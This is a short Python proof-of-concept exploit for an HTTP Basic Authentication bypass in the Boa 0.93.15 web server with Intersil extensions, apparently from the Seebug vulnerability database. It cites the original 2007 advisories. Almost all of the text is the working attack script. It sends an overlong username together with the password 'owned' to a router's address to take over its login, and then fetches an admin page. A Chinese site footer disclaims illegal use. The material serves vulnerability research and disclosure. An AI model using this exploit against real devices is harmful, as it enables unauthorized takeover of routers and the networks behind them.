/* * Boa HTTP Basic Authentication Bypass * Vuln: Boa/0.93.15 (with Intersil Extensions) * * Original Advisory: * http://www.securityfocus.com/archive/1/479434 * http://www.ikkisoft.com/stuff/SN-2007-02.txt * * Luca "ikki" Carettoni * http://www.ikkisoft.com */ ---- #!/usr/bin/env python import urllib2 SERVER_IP_ADDRESS = '192.168.0.1' USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' NEW_PASSWORD = 'owned' auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password('LOGIN(default username & password is admin)', SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD); opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论